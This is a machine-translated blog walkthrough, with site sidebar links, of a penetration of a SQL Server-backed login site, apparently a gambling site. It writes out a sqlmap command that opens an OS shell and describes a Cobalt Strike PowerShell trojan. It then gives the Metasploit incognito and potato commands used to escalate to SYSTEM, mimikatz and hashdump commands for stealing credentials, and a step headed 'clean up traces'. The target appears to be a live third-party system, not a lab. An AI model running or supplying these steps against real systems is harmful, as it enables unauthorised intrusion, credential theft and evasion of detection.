当前位置:网站首页>Penetration practice - sqlserver empowerment
Penetration practice - sqlserver empowerment
2022-07-04 03:43:00 【amingMM】
Technical point :
Yundun dodges
cs / msf Go online with
0x00 Manage premise
BC standing Login screen 
sqlmap Run straight sql Blind note
sqlmap -u "http://127.0.0.1/Login/index " --form --batch --os-shell
os-shell
0x01 go online CS
Cobalt Strike
● Create a listener 
Generate a Powershell command Of Trojans
Throw it to the one just now shell Go inside the command line 
● View permissions
Current shell jurisdiction , Only nt service\mssqlserver, Very low authority 
0x02 Raise the right
● Check out the patches
Installed 154 A patch
Patches : Installed 154 A patch .
[01]: KB2959936
[02]: KB3191564
[03]: KB2896496
[04]: KB2919355
[05]: KB2920189
[06]: KB2928120
[07]: KB2931358
[08]: KB2931366
[09]: KB2933826
[10]: KB2938066
[11]: KB2938772
[12]: KB2949621
[13]: KB2954879
[14]: KB2958262
[15]: KB2958263
[16]: KB2961072
[17]: KB2965500
[18]: KB2966407
[19]: KB2967917
[20]: KB2971203
[21]: KB2971850
[22]: KB2973351
[23]: KB2973448
[24]: KB2975061
[25]: KB2976627
[26]: KB2977629
[27]: KB2981580
[28]: KB2987107
[29]: KB2989647
[30]: KB2989930
[31]: KB2998527
[32]: KB3000850
[33]: KB3003057
[34]: KB3004545
[35]: KB3008242
[36]: KB3011780
[37]: KB3012702
[38]: KB3013172
[39]: KB3013410
[40]: KB3013538
[41]: KB3013769
[42]: KB3013791
[43]: KB3013816
[44]: KB3014442
[45]: KB3019978
[46]: KB3021674
[47]: KB3023266
[48]: KB3024751
[49]: KB3024755
[50]: KB3027209
[51]: KB3030947
[52]: KB3031044
[53]: KB3033446
[54]: KB3034348
[55]: KB3035126
[56]: KB3036612
[57]: KB3038002
[58]: KB3042058
[59]: KB3042085
[60]: KB3043812
[61]: KB3044374
[62]: KB3044673
[63]: KB3045634
[64]: KB3045685
[65]: KB3045717
[66]: KB3045719
[67]: KB3045755
[68]: KB3045999
[69]: KB3046017
[70]: KB3046737
[71]: KB3048043
[72]: KB3054169
[73]: KB3054203
[74]: KB3054256
[75]: KB3054464
[76]: KB3055323
[77]: KB3055343
[78]: KB3055642
[79]: KB3059317
[80]: KB3060681
[81]: KB3060793
[82]: KB3061512
[83]: KB3063843
[84]: KB3071756
[85]: KB3077715
[86]: KB3078405
[87]: KB3078676
[88]: KB3080149
[89]: KB3081320
[90]: KB3082089
[91]: KB3084135
[92]: KB3084905
[93]: KB3086255
[94]: KB3087137
[95]: KB3091297
[96]: KB3092601
[97]: KB3092627
[98]: KB3094486
[99]: KB3095701
[100]: KB3099834
[101]: KB3100473
[102]: KB3102429
[103]: KB3102939
[104]: KB3103616
[105]: KB3103696
[106]: KB3103709
[107]: KB3109103
[108]: KB3109976
[109]: KB3110329
[110]: KB3115224
[111]: KB3121261
[112]: KB3123245
[113]: KB3126041
[114]: KB3126434
[115]: KB3126587
[116]: KB3126593
[117]: KB3132080
[118]: KB3133043
[119]: KB3133690
[120]: KB3134179
[121]: KB3134815
[122]: KB3137728
[123]: KB3138602
[124]: KB3139164
[125]: KB3139398
[126]: KB3139914
[127]: KB3140219
[128]: KB3140234
[129]: KB3144850
[130]: KB3145384
[131]: KB3145432
[132]: KB3146604
[133]: KB3146723
[134]: KB3146751
[135]: KB3147071
[136]: KB3149157
[137]: KB3155784
[138]: KB3156059
[139]: KB3159398
[140]: KB3161949
[141]: KB3162343
[142]: KB3172614
[143]: KB3172729
[144]: KB3175024
[145]: KB3178539
[146]: KB3179574
[147]: KB3185319
[148]: KB4033428
[149]: KB4483187
[150]: KB4486105
[151]: KB4486107
[152]: KB5001403
[153]: KB5007154
[154]: KB5008263
network card : Installed 1 individual NIC.
[01]: Red Hat VirtIO Ethernet Adapter
Connection name : Ethernet
Enable DHCP: yes
Use ms16-075 try 
see AV
https://mrxn.net/avlist/
Alibaba cloud shield
0x03 Transition msf
● newly build payload
choice Foreign HTTP
stay msf Upper use
● CS New session
Select your session to derive the session
stay msf Wait until the session is connected ( Be careful : It seems that the session cannot be derived from the domain prefix )
Permission is still very low , stay CS It uses file browsing to upload rotten potatoes
● In the current session , Right to start :
cd C:\\Users\\Public
use incognito
execute -cH -f ./potato.exe
list_tokens -u
Copy administrator The token
impersonate_token "administrator The token "
Got it system jurisdiction
0x04 Grab Hash
load mimikatz
creds_all
Use msf Self contained :run post/windows/gather/smart_hashdump
Direct login
0x05 Clean up traces
边栏推荐
- What kind of experience is it when the Institute earns 20000 yuan a month!
- Command Execution Vulnerability - command execution - vulnerability sites - code injection - vulnerability exploitation - joint execution - bypass (spaces, keyword filtering, variable bypass) - two ex
- @Scheduled scheduled tasks
- mysql数据库的存储
- MySQL is dirty
- Mindmanager2022 efficient and easy to use office mind map MindManager
- 2022 attached lifting scaffold worker (special type of construction work) free test questions and attached lifting scaffold worker (special type of construction work) examination papers 2022 attached
- 支持首次触发的 Go Ticker
- Webhook triggers Jenkins for sonar detection
- Cache general management class + cache httpcontext Current. Cache and httpruntime Differences between caches
猜你喜欢
Reduce function under functools
Katalon框架测试web(二十六)自动发邮件
Setting methods, usage methods and common usage scenarios of environment variables in postman
Third party login initial version
If you have just joined a new company, don't be fired because of your mistakes
1289_FreeRTOS中vTaskSuspend()接口实现分析
Ningde times and BYD have refuted rumors one after another. Why does someone always want to harm domestic brands?
New year's first race, submit bug reward more!
@Scheduled scheduled tasks
![[Valentine's Day confession code] - Valentine's Day is approaching, and more than 10 romantic love effects are given to the one you love](/img/ab/066923f1aa1e8dd8dcc572cb60a25d.jpg)
[Valentine's Day confession code] - Valentine's Day is approaching, and more than 10 romantic love effects are given to the one you love
随机推荐
EV6 helps the product matrix, and Kia is making efforts in the high-end market. The global sales target in 2022 is 3.15 million?
疫情来袭--远程办公之思考|社区征文
MySQL maxscale realizes read-write separation
Class summation, shortest row
Objective-C string class, array class
如何有效远程办公之我见 | 社区征文
2022 attached lifting scaffold worker (special type of construction work) free test questions and attached lifting scaffold worker (special type of construction work) examination papers 2022 attached
Objective-C member variable permissions
Formulaire day05
SQL injection (1) -- determine whether there are SQL injection vulnerabilities
Stm32bug [stlink forced update prompt appears in keilmdk, but it cannot be updated]
MySQL is dirty
Baijia forum the founding of the Eastern Han Dynasty
[untitled]
Sword finger offer:55 - I. depth of binary tree
渗透实战-guest账户-mimikatz-向日葵-sql提权-离线解密
[Wu Enda deep learning] beginner learning record 3 (regularization / error reduction)
super_ Subclass object memory structure_ Inheritance tree traceability
2022-07-03:数组里有0和1,一定要翻转一个区间,翻转:0变1,1变0。 请问翻转后可以使得1的个数最多是多少? 来自小红书。3.13笔试。
Tcpclientdemo for TCP protocol interaction